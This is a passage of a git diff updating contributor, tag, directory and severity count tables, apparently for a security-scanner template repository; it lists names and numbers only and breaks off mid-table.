türle","count":1},{"name":"thirukrishnan","count":1},{"name":"luciannitescu","count":1},{"name":"invisiblethreat","count":1},{"name":"th3r4id","count":1},{"name":"shreyapohekar","count":1},{"name":"bad5ect0r","count":1},{"name":"pwnwithlove","count":1},{"name":"0xceba","count":1},{"name":"udyz","count":1},{"name":"rschio","count":1},{"name":"r3nz0","count":1},{"name":"akokonunes","count":1},{"name":"brabbit10","count":1},{"name":"elouhi","count":1},{"name":"dhiyanesdk","count":1},{"name":"mihhailsokolov","count":1},{"name":"yusakie","count":1},{"name":"arall","count":1},{"name":"nytr0gen","count":1},{"name":"breno_css","count":1},{"name":"yavolo","count":1},{"name":"apt-mirror","count":1},{"name":"luskabol","count":1},{"name":"dwbzn","count":1},{"name":"omarkurt","count":1},{"name":"osamahamad","count":1},{"name":"gpiechnik2","count":1},{"name":"yuansec","count":1},{"name":"act1on3","count":1},{"name":"_darrenmartyn","count":1},{"name":"jeya.seelan","count":1},{"name":"k3rwin","count":1},{"name":"d0rkerdevil","count":1},{"name":"yaser_s","count":1},{"name":"jcockhren","count":1},{"name":"banana69","count":1},{"name":"aaronchen0","count":1},{"name":"droberson","count":1},{"name":"domenicoveneziano","count":1},{"name":"_harleo","count":1},{"name":"am0nt31r0","count":1},{"name":"win3zz","count":1},{"name":"rubina119","count":1},{"name":"jas37","count":1},{"name":"pdp","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"nerrorsec","count":1},{"name":"adilsoybali","count":1},{"name":"queencitycyber","count":1},{"name":"erikowen","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"dali","count":1},{"name":"qianbenhyu","count":1},{"name":"opencirt","count":1},{"name":"noobexploiter","count":1},{"name":"mantissts","count":1},{"name":"paper-pen","count":1},{"name":"nielsing","count":1},{"name":"lethargynavigator","count":1},{"name":"push4d","count":1},{"name":"jiheon-dev","count":1},{"name":"tim_koopmans","count":1},{"name":"spac3wh1te","count":1},{"name":"arjunchandarana","count":1},{"name":"mr.bobo hp","count":1},{"name":"axrk","count":1},{"name":"ky9oss","count":1},{"name":"2rs3c","count":1},{"name":"harryha","count":1},{"name":"0h1in9e","count":1},{"name":"0xcharan","count":1},{"name":"geraldino2","count":1},{"name":"hlop","count":1},{"name":"gboddin","count":1},{"name":"dale clarke","count":1},{"name":"unknown","count":1},{"name":"dawid-czarnecki","count":1},{"name":"petruknisme","count":1},{"name":"iampritam","count":1},{"name":"pussycat0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mubassirpatel","count":1},{"name":"mah3sec_","count":1},{"name":"couskito","count":1},{"name":"higor melgaço","count":1},{"name":"professorabhay","count":1},{"name":"flag007","count":1},{"name":"pascalheidmann","count":1},{"name":"wpsec","count":1},{"name":"sttlr","count":1},{"name":"anonymous","count":1},{"name":"dmartyn","count":1},{"name":"kurohost","count":1},{"name":"adamparsons","count":1},{"name":"intx0x80","count":1},{"name":"ola456","count":1},{"name":"irshadahamed","count":1},{"name":"liquidsec","count":1},{"name":"marcio mendes","count":1},{"name":"ramondunker","count":1},{"name":"apple","count":1},{"name":"0xh7ml","count":1},{"name":"shiva (strobes security)","count":1},{"name":"carlosvieira","count":1},{"name":"ph33rr","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elitebaz","count":1},{"name":"0xceeb","count":1},{"name":"joaonevess","count":1},{"name":"sw0rk17","count":1},{"name":"0xteles","count":1},{"name":"5up3r541y4n","count":1},{"name":"omarjezi","count":1},{"name":"whynotke","count":1},{"name":"unblvr1","count":1},{"name":"michael wedl","count":1},{"name":"freakyclown","count":1},{"name":"noamrathaus","count":1},{"name":"httpvoid","count":1},{"name":"lady_bug","count":1},{"name":"mhdsamx","count":1},{"name":"puben","count":1},{"name":"luqman","count":1},{"name":"nagli","count":1},{"name":"diablo","count":1},{"name":"arr0way","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"b0yd","count":1},{"name":"y0no","count":1},{"name":"barthy.koeln","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"jadu101","count":1},{"name":"davidfegyver","count":1},{"name":"8authur","count":1},{"name":"akshansh","count":1},{"name":"aron molnar","count":1},{"name":"brianlam38","count":1},{"name":"ahmed sherif","count":1},{"name":"affix","count":1},{"name":"jaimin gondaliya","count":1},{"name":"juliosmelo","count":1},{"name":"hüseyin tintaş","count":1},{"name":"shelld3v","count":1},{"name":"mass0ma","count":1},{"name":"themiddle","count":1},{"name":"r3s ost","count":1},{"name":"fpatrik","count":1},{"name":"high","count":1},{"name":"tangxiaofeng7","count":1},{"name":"aresx","count":1},{"name":"sickwell","count":1},{"name":"zinminphy0","count":1},{"name":"sechunt3r","count":1},{"name":"yashanand155","count":1},{"name":"sicksec","count":1},{"name":"piyushchhiroliya","count":1},{"name":"drfabiocastro","count":1},{"name":"hateshape","count":1},{"name":"b0rn2r00t","count":1},{"name":"_c0wb0y_","count":1},{"name":"nobody","count":1},{"name":"mayank_pandey01","count":1},{"name":"zhenwarx","count":1},{"name":"unkl4b","count":1},{"name":"charanrayudu","count":1},{"name":"tirtha","count":1},{"name":"rotembar","count":1},{"name":"lrtk-coder","count":1},{"name":"undefl0w","count":1},{"name":"godfatherorwa","count":1},{"name":"mariam tariq","count":1},{"name":"majidmc2","count":1},{"name":"abdullahisik","count":1},{"name":"zsusac","count":1},{"name":"aayush vishnoi","count":1},{"name":"micha3lb3n","count":1},{"name":"0xrod","count":1},{"name":"akash.c","count":1},{"name":"open-sec","count":1},{"name":"jteles","count":1},{"name":"mammad_rahimzada","count":1},{"name":"hyunsoo-ds","count":1},{"name":"evolutionsec","count":1},{"name":"hakimkt","count":1},{"name":"byobin","count":1},{"name":"danfaizer","count":1},{"name":"alevsk","count":1},{"name":"aaban solutions","count":1},{"name":"tea","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"shiar","count":1},{"name":"thelicato","count":1},{"name":"phillipo","count":1},{"name":"kailashbohara","count":1},{"name":"chetgan","count":1},{"name":"j33n1k4","count":1},{"name":"makyotox","count":1},{"name":"fur1na","count":1},{"name":"therealtoastycat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"defektive","count":1},{"name":"ledoubletake","count":1},{"name":"bjhulst","count":1},{"name":"vulnspace","count":1},{"name":"n0el4kls","count":1},{"name":"fopina","count":1},{"name":"furkansenan","count":1},{"name":"calumjelrick","count":1},{"name":"miroslavsotak","count":1},{"name":"archer","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"null_hypothesis","count":1},{"name":"jna1","count":1},{"name":"harshinsecurity","count":1},{"name":"galoget","count":1},{"name":"houdinis","count":1},{"name":"youngpope","count":1},{"name":"mordavid","count":1},{"name":"mukundbhuva","count":1},{"name":"hardik-rathod","count":1},{"name":"viniciuspereiras","count":1},{"name":"rotemreiss","count":1},{"name":"0xkayala","count":1},{"name":"orpheus","count":1},{"name":"ringo","count":1},{"name":"ok_bye_now","count":1},{"name":"xeldax","count":1},{"name":"blckraven","count":1},{"name":"evan rubinstien","count":1},{"name":"kchason","count":1},{"name":"kagamigawa","count":1},{"name":"absshax","count":1},{"name":"myst7ic","count":1},{"name":"manasmbellani","count":1},{"name":"napgh0st","count":1},{"name":"prettyboyaaditya","count":1},{"name":"christbowel","count":1},{"name":"alex","count":1},{"name":"0xd0ff9","count":1},{"name":"watchtowr","count":1},{"name":"guax1","count":1},{"name":"shifacyclewla","count":1},{"name":"0xprial","count":1},{"name":"rumble773","count":1},{"name":"manuelbua","count":1},{"name":"0xtavian","count":1},{"name":"danigoland","count":1},{"name":"jc175","count":1},{"name":"h4kux","count":1},{"name":"s1r1u5_","count":1},{"name":"exceed","count":1},{"name":"amir-h-fallahi","count":1},{"name":"schniggie","count":1},{"name":"hczdmr","count":1},{"name":"philippdelteil","count":1},{"name":"ofjaaah","count":1},{"name":"whotwagner","count":1},{"name":"failopen","count":1},{"name":"h4sh5","count":1},{"name":"ptonewreckin","count":1},{"name":"ilovebinbash","count":1},{"name":"bughuntersurya","count":1},{"name":"miguelsegoviagil","count":1},{"name":"yashgoti","count":1},{"name":"momen eldawakhly","count":1},{"name":"allenwest24","count":1},{"name":"imhunterand","count":1},{"name":"mbmy","count":1},{"name":"bartu utku sarp","count":1},{"name":"smaranchand","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"hexcat","count":1},{"name":"chron0x","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"cbadke","count":1},{"name":"drewvravick","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"sinsinology","count":1},{"name":"borna nematzadeh","count":1},{"name":"ooooooo_q","count":1},{"name":"lbb","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"w8ay","count":1},{"name":"zeyad azima","count":1},{"name":"andysvints","count":1},{"name":"xcapri","count":1},{"name":"d4ly","count":1},{"name":"petergrifin","count":1},{"name":"matt miller","count":1},{"name":"fmunozs","count":1},{"name":"mayankpandey01","count":1},{"name":"patrick pirker","count":1},{"name":"anon-artist","count":1},{"name":"ling","count":1},{"name":"unp4ck","count":1}],"directory":[{"name":"http","count":7547},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":134},{"name":"cloud","count":99},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":12},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"passive","count":1}],"severity":[{"name":"info","count":3697},{"name":"high","count":1770},{"name":"medium","count":1528},{"name":"critical","count":1044},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2224519a71..0a0fd735c2 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5410 +1,5507 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | -| edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 594 | r3y3r53 | 200 | contributors.json | 1 | | | | | -| packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 497 | gy741 | 158 | cves.json | 1 | | | | | -| cve2021 | 491 | rxerium | 142 | | | | | | | -| cve2022 | 476 | righettod | 141 | | | | | | | -| wp | 421 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 374 | arafatansari | 118 | | | | | | | -| unauth | 366 | tess | 109 | | | | | | | -| sqli | 357 | pdresearch | 82 | | | | | | | -| file | 346 | iamnoooob | 69 | | | | | | | -| authenticated | 341 | idealphase | 66 | | | | | | | -| intrusive | 300 | madrobot | 65 | | | | | | | -| detect | 283 | zzeitlin | 64 | | | | | | | -| login | 276 | rootxharsh | 62 | | | | | | | -| kev | 268 | akincibor | 59 | | | | | | | -| cve2020 | 257 | for3stco1d | 55 | | | | | | | -| token-spray | 243 | philippedelteil | 53 | | | | | | | -| oast | 222 | gaurang | 42 | | | | | | | -| config | 221 | edoardottt | 42 | | | | | | | -| top-200 | 215 | johnk3r | 41 | | | | | | | -| default-login | 212 | c-sh0 | 35 | | | | | | | -| osint-social | 210 | j4vaovo | 35 | | | | | | | -| token | 193 | adam crosser | 31 | | | | | | | -| | 192 | luisfelipe146 | 31 | | | | | | | -| network | 192 | mastercho | 29 | | | | | | | -| apache | 189 | ice3man | 29 | | | | | | | -| devops | 176 | pwnhxl | 28 | | | | | | | -| cve2018 | 169 | organiccrap | 24 | | | | | | | -| iot | 166 | hardik-solanki | 24 | | | | | | | -| cve2019 | 165 | techbrunchfr | 23 | | | | | | | -| keys | 155 | harsh | 23 | | | | | | | -| joomla | 148 | ctflearner | 23 | | | | | | | -| malware | 142 | ffffffff0x | 22 | | | | | | | -| redirect | 135 | parthmalhotra | 20 | | | | | | | -| aws | 133 | cckuailong | 18 | | | | | | | -| cloud | 132 | kazgangap | 18 | | | | | | | -| auth-bypass | 131 | sullo | 18 | | | | | | | -| ssrf | 119 | bhutch | 17 | | | | | | | -| install | 118 | 0xpugazh | 16 | | | | | | | -| phishing | 117 | shaikhyaser | 16 | | | | | | | -| amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | random-robbie | 16 | | | | | | | -| cve2010 | 112 | sheikhrishad | 15 | | | | | | | -| cms | 112 | pr3r00t | 15 | | | | | | | -| cve2017 | 110 | unapibageek | 15 | | | | | | | -| router | 108 | r3dg33k | 14 | | | | | | | -| top-100 | 100 | milo2012 | 14 | | | | | | | -| disclosure | 89 | tenbird | 14 | | | | | | | -| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | -| linux | 83 | userdehghani | 14 | | | | | | | -| code | 81 | nullfuzz | 13 | | | | | | | -| local | 80 | theabhinavgaur | 13 | | | | | | | -| privesc | 79 | sharath | 13 | | | | | | | -| seclists | 79 | melbadry9 | 13 | | | | | | | -| takeover | 79 | 0ri2n | 13 | | | | | | | -| tokens | 78 | elsfa7110 | 13 | | | | | | | -| fileupload | 76 | meme-lord | 12 | | | | | | | -| oracle | 71 | suman_kar | 12 | | | | | | | -| cve2024 | 69 | kazet | 12 | | | | | | | -| oss | 67 | cyllective | 11 | | | | | | | -| cisco | 66 | wdahlenb | 11 | | | | | | | -| js | 63 | alph4byt3 | 10 | | | | | | | -| adobe | 62 | nadino | 10 | | | | | | | -| ir | 61 | 0x240x23elu | 10 | | | | | | | -| huntr | 59 | hackergautam | 10 | | | | | | | -| cve2015 | 59 | random_robbie | 10 | | | | | | | -| atlassian | 57 | logicalhunter | 10 | | | | | | | -| cve2016 | 57 | co5mos | 10 | | | | | | | -| enum | 56 | initstring | 9 | | | | | | | -| google | 56 | emadshanab | 9 | | | | | | | -| vmware | 56 | olearycrew | 9 | | | | | | | -| c2 | 55 | momika233 | 9 | | | | | | | -| logs | 48 | adamcrosser | 9 | | | | | | | -| tenable | 48 | oppsec | 9 | | | | | | | -| log4j | 47 | fabaff | 9 | | | | | | | -| hackerone | 46 | that_juan_ | 8 | | | | | | | -| vulhub | 46 | aashiq | 8 | | | | | | | -| aem | 45 | noraj | 8 | | | | | | | -| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | -| php | 44 | veshraj | 8 | | | | | | | -| jndi | 44 | zh | 8 | | | | | | | -| cve2014 | 44 | irshad ahamed | 8 | | | | | | | -| debug | 44 | iamthefrogy | 8 | | | | | | | -| deserialization | 43 | divya_mudgal | 7 | | | | | | | -| osint-porn | 42 | leovalcante | 7 | | | | | | | -| traversal | 42 | nodauf | 7 | | | | | | | -| oa | 42 | caspergn | 7 | | | | | | | -| generic | 42 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| plugin | 42 | amit-jd | 7 | | | | | | | -| osint-hobby | 42 | huta0 | 7 | | | | | | | -| springboot | 41 | kophjager007 | 7 | | | | | | | -| cnvd | 40 | its0x08 | 7 | | | | | | | -| misc | 39 | techryptic (@tech) | 7 | | | | | | | -| microsoft | 38 | dr_set | 7 | | | | | | | -| injection | 38 | randomstr1ng | 7 | | | | | | | -| jira | 37 | tarunkoyalwar | 7 | | | | | | | -| listing | 37 | harshbothra_ | 7 | | | | | | | -| kubernetes | 37 | gitlab red team | 6 | | | | | | | -| ibm | 36 | evan rubinstein | 6 | | | | | | | -| cti | 36 | __fazal | 6 | | | | | | | -| osint-misc | 35 | clem9669 | 6 | | | | | | | -| sap | 34 | pathtaga | 6 | | | | | | | -| ssl | 33 | forgedhallpass | 6 | | | | | | | -| fuzz | 33 | megamansec | 6 | | | | | | | -| miscellaneous | 32 | pentest_swissky | 6 | | | | | | | -| osint-tech | 31 | hahwul | 6 | | | | | | | -| osint-coding | 30 | byt3bl33d3r | 6 | | | | | | | -| tls | 30 | imnightmaree | 6 | | | | | | | -| ec2 | 30 | puzzlepeaches | 6 | | | | | | | -| wp-theme | 30 | ja1sh | 6 | | | | | | | -| dlink | 30 | xelkomy | 6 | | | | | | | -| k8s | 28 | praetorian-thendrickson | 6 | | | | | | | -| api | 28 | devang-solanki | 6 | | | | | | | -| gitlab | 28 | justaacat | 6 | | | | | | | -| fortinet | 28 | kh4sh3i | 5 | | | | | | | -| bestwebsoft | 27 | andreluna | 5 | | | | | | | -| citrix | 27 | your3cho | 5 | | | | | | | -| proxy | 27 | r3naissance | 5 | | | | | | | -| firewall | 26 | defr0ggy | 5 | | | | | | | -| cve2012 | 26 | s0obi | 5 | | | | | | | -| lfr | 26 | joanbono | 5 | | | | | | | -| ssh | 25 | vicrack | 5 | | | | | | | -| weaver | 25 | panch0r3d | 5 | | | | | | | -| manageengine | 25 | r12w4n | 5 | | | | | | | -| zohocorp | 25 | gtrrnr | 5 | | | | | | | -| zoho | 24 | powerexploit | 5 | | | | | | | -| osint-shopping | 24 | shine | 5 | | | | | | | -| osint-finance | 24 | ganofins | 5 | | | | | | | -| dns | 24 | prajiteshsingh | 5 | | | | | | | -| osint-business | 24 | lucky0x0d | 5 | | | | | | | -| osint-images | 24 | mr-xn | 5 | | | | | | | -| admin | 23 | podalirius | 5 | | | | | | | -| audit | 23 | yanyun | 5 | | | | | | | -| stored-xss | 23 | robotshell | 5 | | | | | | | -| xxe | 23 | arm!tage | 5 | | | | | | | -| yonyou | 23 | pulsesecurity.co.nz | 4 | | | | | | | -| file-upload | 23 | m4lwhere | 4 | | | | | | | -| tomcat | 23 | heeress | 4 | | | | | | | -| s3 | 22 | tanq16 | 4 | | | | | | | -| cicd | 22 | shankar acharya | 4 | | | | | | | -| github | 22 | scent2d | 4 | | | | | | | -| prestashop | 22 | xxcdd | 4 | | | | | | | -| weblogic | 21 | dadevel | 4 | | | | | | | -| printer | 21 | wisnupramoedya | 4 | | | | | | | -| ecology | 21 | dolev farhi | 4 | | | | | | | -| dast | 21 | lum8rjack | 4 | | | | | | | -| msf | 21 | king-alexander | 4 | | | | | | | -| jenkins | 20 | iamnooob | 4 | | | | | | | -| camera | 20 | nybble04 | 4 | | | | | | | -| rukovoditel | 19 | jpg0mez | 4 | | | | | | | -| ftp | 19 | 0xr2r | 4 | | | | | | | -| struts | 19 | ggranjus | 4 | | | | | | | -| wavlink | 19 | e_schultze_ | 4 | | | | | | | -| hp | 19 | ice3man543 | 4 | | | | | | | -| grafana | 19 | k0pak4 | 4 | | | | | | | -| android | 18 | 3th1c_yuk1 | 4 | | | | | | | -| cve2011 | 18 | incogbyte | 4 | | | | | | | -| osint-music | 18 | h1ei1 | 4 | | | | | | | -| ruijie | 18 | cookiehanhoan | 4 | | | | | | | -| coldfusion | 18 | unstabl3 | 3 | | | | | | | -| vpn | 17 | splint3r7 | 3 | | | | | | | -| confluence | 17 | swissky | 3 | | | | | | | -| azure | 17 | z3bd | 3 | | | | | | | -| honeypot | 17 | skeltavik | 3 | | | | | | | -| nginx | 17 | flx | 3 | | | | | | | -| node.js | 17 | binaryfigments | 3 | | | | | | | -| service | 17 | true13 | 3 | | | | | | | -| mail | 17 | evergreencartoons | 3 | | | | | | | -| microweber | 16 | randomrobbie | 3 | | | | | | | -| cve2009 | 16 | emenalf | 3 | | | | | | | -| jarm | 16 | e1a | 3 | | | | | | | -| status | 16 | j3ssie | 3 | | | | | | | -| alibaba | 16 | jarijaas | 3 | | | | | | | -| backup | 16 | whoever | 3 | | | | | | | -| rconfig | 16 | sushantkamble | 3 | | | | | | | -| magento | 16 | cheesymoon | 3 | | | | | | | -| osint-blog | 16 | matt galligan | 3 | | | | | | | -| woocommerce | 15 | me9187 | 3 | | | | | | | -| cve2013 | 15 | _generic_human_ | 3 | | | | | | | -| ssti | 15 | johnjhacking | 3 | | | | | | | -| setup | 15 | salts | 3 | | | | | | | -| nodejs | 15 | badboycxcc | 3 | | | | | | | -| tongda | 15 | aringo | 3 | | | | | | | -| cnvd2021 | 15 | dr0pd34d | 3 | | | | | | | -| seeyon | 15 | fyoorer | 3 | | | | | | | -| bypass | 15 | andydoering | 3 | | | | | | | -| installer | 15 | farish | 3 | | | | | | | -| backdoor | 15 | ph33r | 3 | | | | | | | -| cve2008 | 15 | taielab | 3 | | | | | | | -| ruby | 15 | dudez | 3 | | | | | | | -| zyxel | 15 | c4sper0 | 3 | | | | | | | -| dashboard | 15 | fxploit | 3 | | | | | | | -| java | 15 | alifathi-h1 | 3 | | | | | | | -| moosocial | 15 | 0w4ys | 3 | | | | | | | -| headless | 14 | isacaya | 3 | | | | | | | -| creds-stuffing | 14 | imjust0 | 3 | | | | | | | -| docker | 14 | bernardofsr | 3 | | | | | | | -| windows | 14 | shifacyclewala | 3 | | | | | | | -| smb | 14 | yash anand @yashanand155 | 3 | | | | | | | -| login-check | 14 | xianke | 3 | | | | | | | -| npm | 14 | arcc | 3 | | | | | | | -| rds | 14 | atomiczsec | 3 | | | | | | | -| nagios | 14 | yuzhe-zhang-0 | 3 | | | | | | | -| redis | 14 | impramodsargar | 3 | | | | | | | -| jboss | 14 | f1tz | 3 | | | | | | | -| icewarp | 14 | huowuzhao | 3 | | | | | | | -| git | 14 | vsh00t | 3 | | | | | | | -| domainmod | 14 | lucasljm2001 | 3 | | | | | | | -| osint-art | 14 | ambassify | 3 | | | | | | | -| node | 14 | coldfish | 3 | | | | | | | -| redhat | 14 | parth | 3 | | | | | | | -| auth | 14 | ekrause | 3 | | | | | | | -| smtp | 14 | lark-lab | 3 | | | | | | | -| osint-health | 14 | mavericknerd | 3 | | | | | | | -| dell | 14 | canberbamber | 3 | | | | | | | -| osint-political | 13 | davidmckennirey | 3 | | | | | | | -| cuppa | 13 | thomas_from_offensity | 3 | | | | | | | -| osint-dating | 13 | vagnerd | 3 | | | | | | | -| graphql | 13 | bmcel | 2 | | | | | | | -| airflow | 13 | 0xsmiley | 2 | | | | | | | -| hashicorp | 13 | moritz nentwig | 2 | | | | | | | -| laravel | 13 | mrharshvardhan | 2 | | | | | | | -| sonicwall | 13 | ree4pwn | 2 | | | | | | | -| cuppacms | 13 | bp0lr | 2 | | | | | | | -| netgear | 13 | cocxanh | 2 | | | | | | | -| ivanti | 13 | paradessia | 2 | | | | | | | -| abstractapi | 13 | bing0o | 2 | | | | | | | -| postgresql | 13 | supr4s | 2 | | | | | | | -| rails | 13 | 0xsapra | 2 | | | | | | | -| fortigate | 13 | afaq | 2 | | | | | | | -| mysql | 13 | herry | 2 | | | | | | | -| vbulletin | 12 | thevillagehacker | 2 | | | | | | | -| kafka | 12 | shankaracharya | 2 | | | | | | | -| webserver | 12 | z0ne | 2 | | | | | | | -| doppler | 12 | w4cky_ | 2 | | | | | | | -| netsweeper | 12 | maximus decimus | 2 | | | | | | | -| zimbra | 12 | sinkettu | 2 | | | | | | | -| ofbiz | 12 | danmcinerney | 2 | | | | | | | -| newrelic | 12 | nuk3s3c | 2 | | | | | | | -| drupal | 12 | ehsahil | 2 | | | | | | | -| info-leak | 12 | kiblyn11 | 2 | | | | | | | -| cache | 11 | cckuakilong | 2 | | | | | | | -| iam | 11 | supras | 2 | | | | | | | -| iis | 11 | wa1tf0rme | 2 | | | | | | | -| spring | 11 | msegoviag | 2 | | | | | | | -| xstream | 11 | github.com/its0x08 | 2 | | | | | | | -| prometheus | 11 | thezakman | 2 | | | | | | | -| django | 11 | randomdhiraj | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | usdag | 2 | | | | | | | -| osint-video | 11 | streetofhackerr007 | 2 | | | | | | | -| fastjson | 11 | 0xnirvana | 2 | | | | | | | -| hikvision | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | -| jolokia | 11 | martincodes-de | 2 | | | | | | | -| jetbrains | 11 | israel comazzetto dos reis | 2 | | | | | | | -| online-fire-reporting | 11 | christianpoeschl | 2 | | | | | | | -| phpmyadmin | 11 | redteambrasil | 2 | | | | | | | -| phpgurukul | 11 | mohammedsaneem | 2 | | | | | | | -| zabbix | 10 | amirhossein raeisi | 2 | | | | | | | -| elasticsearch | 10 | c3l3si4n | 2 | | | | | | | -| sitecore | 10 | ayadim | 2 | | | | | | | -| solr | 10 | socketz | 2 | | | | | | | -| dahua | 10 | bananabr | 2 | | | | | | | -| xstream_project | 10 | codexlynx | 2 | | | | | | | -| dropbox | 10 | charles d. | 2 | | | | | | | -| digitalocean | 10 | kishore-hariram | 2 | | | | | | | -| samsung | 10 | h0j3n | 2 | | | | | | | -| db | 10 | brucelsone | 2 | | | | | | | -| dedecms | 10 | ajaysenr | 2 | | | | | | | -| thinkphp | 10 | koti2 | 2 | | | | | | | -| solarview | 10 | korteke | 2 | | | | | | | -| symfony | 10 | gal nagli | 2 | | | | | | | -| glpi | 10 | davidegirardi | 2 | | | | | | | -| python | 9 | notnotnotveg | 2 | | | | | | | -| versa | 9 | x1m_martijn | 2 | | | | | | | -| firebase | 9 | pxmme1337 | 2 | | | | | | | -| crlf | 9 | paperpen | 2 | | | | | | | -| moodle | 9 | joshlarsen | 2 | | | | | | | -| exchange | 9 | nkxxkn | 2 | | | | | | | -| bitbucket | 9 | liwermor | 2 | | | | | | | -| cnvd2020 | 9 | t3l3machus | 2 | | | | | | | -| gitea | 9 | thardt-praetorian | 2 | | | | | | | -| sophos | 9 | lstatro | 2 | | | | | | | -| lucee | 9 | sbani | 2 | | | | | | | -| scada | 9 | hackerarpan | 2 | | | | | | | -| cloudtrail | 9 | gevakun | 2 | | | | | | | -| artica | 9 | florianmaak | 2 | | | | | | | -| secret | 9 | bsysop | 2 | | | | | | | -| kube | 9 | ep1csage | 2 | | | | | | | -| wso2 | 9 | parzival | 2 | | | | | | | -| facebook | 9 | lotusdll | 2 | | | | | | | -| elastic | 9 | clarkvoss | 2 | | | | | | | -| pfsense | 9 | d4vy | 2 | | | | | | | -| sangfor | 9 | v0idc0de | 2 | | | | | | | -| opencats | 9 | 0xelkomy | 2 | | | | | | | -| vcenter | 9 | egemenkochisarli | 2 | | | | | | | -| druid | 9 | 0xcrypto | 2 | | | | | | | -| blind | 9 | zomsop82 | 2 | | | | | | | -| progress | 9 | pbuff07 | 2 | | | | | | | -| config-audit | 8 | shelled | 2 | | | | | | | -| e-office | 8 | danielmofer | 2 | | | | | | | -| manager | 8 | 666asd | 2 | | | | | | | -| gateway | 8 | 8arthur | 2 | | | | | | | -| huawei | 8 | udit_thakkur | 2 | | | | | | | -| recon | 8 | convisoappsec | 2 | | | | | | | -| symantec | 8 | joeldeleep | 2 | | | | | | | -| microfocus | 8 | kre80r | 2 | | | | | | | -| phpjabbers | 8 | hetroublemakr | 2 | | | | | | | -| hms | 8 | sascha brendel | 2 | | | | | | | -| cloud-enum | 8 | 0xrudra | 2 | | | | | | | -| nexus | 8 | joshua rogers | 2 | | | | | | | -| ognl | 8 | amsda | 2 | | | | | | | -| wanhu | 8 | dheerajmadhukar | 2 | | | | | | | -| oauth | 8 | foulenzer | 2 | | | | | | | -| discord | 8 | dahse89 | 2 | | | | | | | -| mlflow | 8 | y4er | 2 | | | | | | | -| bucket | 8 | manas_harsh | 2 | | | | | | | -| metadata | 8 | brenocss | 2 | | | | | | | -| phpinfo | 8 | mzack9999 | 2 | | | | | | | -| mirai | 8 | rafaelwdornelas | 2 | | | | | | | -| cisco-switch | 8 | luci | 2 | | | | | | | -| spotweb | 8 | thabisocn | 2 | | | | | | | -| spotweb_project | 8 | geekby | 2 | | | | | | | -| console | 8 | arliya | 2 | | | | | | | -| error | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| emerge | 8 | nvn1729 | 2 | | | | | | | -| osint-news | 8 | n-thumann | 2 | | | | | | | -| default-page | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| go | 8 | g4l1t0 | 2 | | | | | | | -| unauthenticated | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| odoo | 8 | myztique | 2 | | | | | | | -| atom | 8 | 6mile | 2 | | | | | | | -| monstra | 7 | k11h-de | 2 | | | | | | | -| database | 7 | dbrwsky | 2 | | | | | | | -| avtech | 7 | zy9ard3 | 2 | | | | | | | -| mongodb | 7 | uomogrande | 2 | | | | | | | -| nagiosxi | 7 | serrapa | 2 | | | | | | | -| keking | 7 | dogancanbakir | 2 | | | | | | | -| telesquare | 7 | sy3omda | 2 | | | | | | | -| moodating | 7 | vavkamil | 2 | | | | | | | -| landray | 7 | raesene | 2 | | | | | | | -| joomla\! | 7 | borna nematzadeh | 1 | | | | | | | -| mobileiron | 7 | invisiblethreat | 1 | | | | | | | -| twitter | 7 | cravaterouge | 1 | | | | | | | -| openemr | 7 | lrtk-coder | 1 | | | | | | | -| nortekcontrol | 7 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| instrusive | 7 | olewagner | 1 | | | | | | | -| rfi | 7 | youngpope | 1 | | | | | | | -| car_rental_management_system_project | 7 | zinminphy0 | 1 | | | | | | | -| slack | 7 | 